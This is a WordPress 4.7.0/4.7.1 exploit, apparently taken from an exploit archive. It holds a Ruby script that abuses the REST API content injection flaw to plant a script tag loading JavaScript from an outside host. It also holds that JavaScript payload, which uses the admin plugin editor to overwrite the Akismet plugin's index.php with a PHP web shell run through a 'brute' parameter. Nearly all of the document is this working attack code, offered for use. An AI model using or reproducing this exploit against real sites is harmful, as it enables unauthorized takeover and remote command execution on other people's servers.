WordPress 4.7.0 / 4.7.1 - Unauthenticated Content Injection Arbitrary Code Execution Exploit

# Exploit Title: WP Content Injection Shell Exploit
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Bacbox ubuntu Linux
# Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :)
# Credits : Marc, Sucuri, Brute
# Lang : Ruby
 
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id" => "#{postid}justtryingshell",
    "title" => "Shell Access Exploit",
    "content" => "Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>"
  }.to_json,
  :content_type => :json,
  :accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'"
else
puts "This site is not Vulnerable"
end
 
 
#--- wprce.js --- #
x=new XMLHttpRequest()
p='/wp-admin/plugin-editor.php?'
f='file=akismet/index.php'
x.open('GET',p+f,0)
x.send()
$='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f
x.open('POST',p+f,1)
x.setRequestHeader('Content-Type','application/x-www-form-urlencoded')
x.send($)
#--- EOF --- #

#  0day.today [2018-04-04]  #